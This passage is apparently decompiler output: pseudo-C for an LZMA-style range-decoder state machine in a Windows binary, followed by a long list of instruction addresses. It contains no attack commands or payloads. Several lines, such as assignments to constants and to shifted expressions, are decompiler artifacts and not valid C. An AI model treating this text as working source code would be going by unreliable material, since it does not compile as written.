												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406566
0x00406566
0x00406566
0x00406566
0x0040656c
0x00406570
0x00406574
0x0040657e
0x0040658c
0x00406862
0x00406862
0x00406865
0x0040686c
0x00406899
0x00406899
0x0040689d
0x00000000
0x00000000
0x0040689f
0x004068a8
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068c0
0x004068d9
0x004068dc
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068d1
0x004068d4
0x004068d4
0x004068f6
0x00406896
0x00406896
0x00406896
0x00406899
0x0040689d
0x00000000
0x00000000
0x00000000
0x004068f8
0x004068f8
0x00406871
0x00406875
0x004069ad
0x004069ad
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x004069d3
0x0040687b
0x00406881
0x00406888
0x00406890
0x00406890
0x00406893
0x00000000
0x00406893
0x004068fd
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00406819
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00405fc4
0x00000000
0x00405fcb
0x00405fcf
0x00000000
0x00000000
0x00405fd5
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406030
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00406920
0x00000000
0x00406920
0x0040607a
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a4
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x0040692f
0x00000000
0x0040692f
0x004060ea
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067ee
0x004067f2
0x004069a1
0x004069a1
0x00000000
0x004069a1
0x004067f8
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00406813
0x00406813
0x00406819
0x00406819
0x00000000
0x00000000
0x00406131
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x00000000
0x004061be
0x00406138
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d0
0x004063d4
0x004063f2
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x0040647d
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064ee
0x004064f2
0x004064f9
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00406977
0x00000000
0x00406977
0x004065df
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00406947
0x00000000
0x00406947
0x0040628d
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00406953
0x00000000
0x00406953
0x00406351
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00406983
0x00000000
0x00406983
0x00406662
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x00000000
0x00000000
0x00406767
0x00406767
0x0040676b
0x0040678d
0x0040678d
0x00406790
0x0040679a
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040676d
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00406862
0x00406865
0x0040686c
0x00000000
0x0040686f
0x0040682a
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406915
0x00406918
0x00406819
0x00406819
0x00406819
0x00000000
0x0040681f
0x00000000
0x0040654f
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
